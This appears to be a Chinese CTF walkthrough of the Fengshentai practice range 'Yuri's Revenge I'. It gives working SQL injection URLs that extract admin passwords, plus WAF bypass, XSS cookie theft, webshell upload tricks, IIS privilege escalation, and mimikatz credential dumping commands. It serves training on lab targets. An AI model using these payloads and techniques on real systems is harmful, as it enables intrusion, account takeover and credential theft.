尤里的复仇Ⅰ 小芳！【8题】

第一章：为了女神小芳！
第二章：遇到阻难！绕过WAF过滤！
第三章：为了更多的权限！留言板！
第四章：进击！拿到Web最高权限！
第五章：SYSTEM！POWER！
第六章：GET THE PASS！
萌新也能找CMS漏洞
基础工具运用：爆破管理员账户登录后台

封神台-掌控安全在线演练靶场

第一章：为了女神小芳！

没有防护的sql注入，查看到有sql注入点
http://rhiq8003.ia.aqlab.cn/?id=1 or 1=1
通过测试，此payload适合注入，查看字段
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1 order by 2
发现字段数位2
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1 order by 3
查看数据库和用户名，并得知显示第二个字段
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select user(),database()
查表
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema='maoshe'
查字段
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name='admin'
因为只显示一个字段，故可用limit达到输出第1，2，3个数据等
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name='admin' limit 1,1
查到第三个数据的字段位password
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name='admin' limit 2,1
查字段的内容，得到flag
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,password from admin

第二章：遇到阻难！绕过WAF过滤！

当点击新闻时，会出现?id=,测试发现注入点

http://kypt8004.ia.aqlab.cn/shownews.asp?id=169 order by 10
发现有10个字段
http://kypt8004.ia.aqlab.cn/shownews.asp?id=169 order by 11
很多sql语句被黑名单限制
尝试之后发现可用使用cookie注入，有注入点
尝试union select 1，2，3，4，5，6，7，8，9，10提示数据库出错，再尝试猜测字段admin是否在库中，union select 1，2，3，4，5，6，7，8，9，10 from admin，正确回显了可显示的字段：2.7.8.9
在可显示的字段位数上查询admin表里是否存在username和password,结果显示了存在username和password
用MD5解密passsword

再御剑扫出后台

登录后台登录系统

第三章：为了更多的权限！留言板！

使用xss平台（https://xss8.cc），接收到管理员的cookie
首先创建一个项目

勾选这两个选项

将下面的代码复制到存在xss漏洞的地方
在到平台查看结果，得到cookie，里面存在flag

第四章：进击！拿到Web最高权限！

将此cookie复制到下面的登录页面

使用后台管理者的cookie直接登录到后台

找到上传webshell的位置
上传1.asp,被拦截

将1.asp与图片合成一张新的图片，变成2.gif
将2.gif改为2.cer再上传

用蚁剑连接
得到flag

第五章：SYSTEM！POWER！

我使用蚁剑会出错，之后就换成菜刀了

iis6.exe提权是利用iis6.0远程代码执行漏洞获取到一个webshell之后，进行的提权操作

这里没有使用cmd和iis.exe，没有查看权限

将cmd.exe和iis6.exe上传，这里已经有人上传过了，直接拿来用iis6.exe

这里使用了cmd，没有使用iis.exe，是普通权限

使用iis.exe提权，得到系统权限

添加新用户
将用户添加到Administrator组里
tasklist -svc查看远程服务的进程号了，2444为远程服务的进程号
之后根据进程号查看开启的端口时多时
netstat查看端口号，开启了3389，可进行远程连接
(这两个步骤验证远程连接的端口号)

ping 域名可查看到ip
ip+端口号

连接到目标主机，查看到flag

第六章：GET THE PASS！

发现压缩包没有查看权限，可更改权限
将拒绝上面的勾全部取消

发现查看需要管理员的登录密码

使用mimikatz抓取密码
privilege::debug,提升权限
sekurlsa::logonpasswords导出明文密码，得到密码:wow!yougotit!

访问文件，得到flag

萌新也能找CMS漏洞

方法一：

在更改信息时，上传1.php，将content-type类型改为图片类型image/jpeg

上传成功
指向图片，复制图片地址
用菜刀连接，得到flag

不过flag不对，提交显示错误，（还有其他方法）

方法二：
源代码审计
在ad_js.php里面传入的ad_id参数并没有过滤sql注入的相关字符，故可从此注入
查字段为7个字段
只有字段7显示内容
ming查库

查表，这里转义了',变成了\',故可以使用0x626c75655f74657374(用16进制时，不需要加引号，并且前面需加0x)代替'blue_test'

查字段

查字段内容,得到用户名与密码，密码需md5解密

下面网址的报错注入，我没有测试，你们可以测试一下

基础工具运用：爆破管理员账户登录后台

找到后台登录页面
http://rhiq8003.ia.aqlab.cn/dami_777/dami_888/admin.php
开始爆破
登录得到flag

封神台在线靶场--尤里的复仇Ⅰ 小芳！【8题】相关推荐

【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳！一二三四五六七章
[封神台 - 掌控安全靶场]尤里的复仇小芳! 第一章:为了女神小芳! SQL注入攻击原理实战演练一.判断是否存在sql注入漏洞二.判断字段数三.判断回显点四.正式注入五.sql自动化注入 ...
【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳一二三四五六章
[封神台 - 掌控安全靶场]尤里的复仇 Ⅰ 小芳一二三四五六章文章目录 [封神台 - 掌控安全靶场]尤里的复仇 Ⅰ 小芳一二三四五六章第一章:为了女神小芳 SQL注入攻击原理实战演练第二章: ...
封神台-第二章尤里的复仇
封神台-第二章尤里的复仇 1. 任意选择一条新闻动态 2. 发现出现交互界面 url中id=170 存在注入点 3.判断字段数 ?id=170+order+by+10 ?id=170+order+b ...
尤里的复仇Ⅰ 小芳！
尤里的复仇Ⅰ 小芳! 第三章:为了更多的权限!留言板! 判断是否为xss跨站脚本攻击查看cookie 利用xss平台 flag就在cookie里面第四章:进阶!拿到Web最高权限! 修改为管理员c ...
封神台——第一关：为了女神小芳
题目:获取数据库管理员密码方法一: 这里我用的是kali虚拟机进行的渗透测试步骤一: 点击"点击查看新闻"超链接,跳转到一个页面,url发生改变,设想这个页面存在sql漏洞. ...
封神台——高校靶场ctf——第一期Web web_001
封神台-高校靶场ctf-第一期Web web_001 web_001 签到难度:⭐ 首先点击传送门打开相应的题目可以看到这样一个画面,一个链接不到的反应,但题目以及告诉,F12就完事. 显然答案没 ...
封神台—高校靶场ctf—第一期Web web_008
封神台-高校靶场ctf-第一期Web web_008 web_008 php审计难度:⭐⭐ 首先咱们观察提示获取源码,这时第一想到的就是查看网页源码咱们先点开传送门来看一下题一个可以提交数据到服务 ...
封神台靶场尤里的复仇I第一第二第五第六第七章解题思路(持续更新）
文章目录一 .第一章二.第二章三.第五章四.第六章五.第七章总结提示: 本文按照靶场题目推进顺序进行,由于作者水平有限,有讲述不当之处敬请批评指出,有更好的解法欢迎在评论区发表. 本文将 ...
封神台靶场-尤里的复仇-第二章
1,随便选择一则新闻,同样判断是否存在SQL注入发现存在and update delete ; insert mid master限制 and update delete ; insert mid m ...

封神台在线靶场--尤里的复仇Ⅰ 小芳！【8题】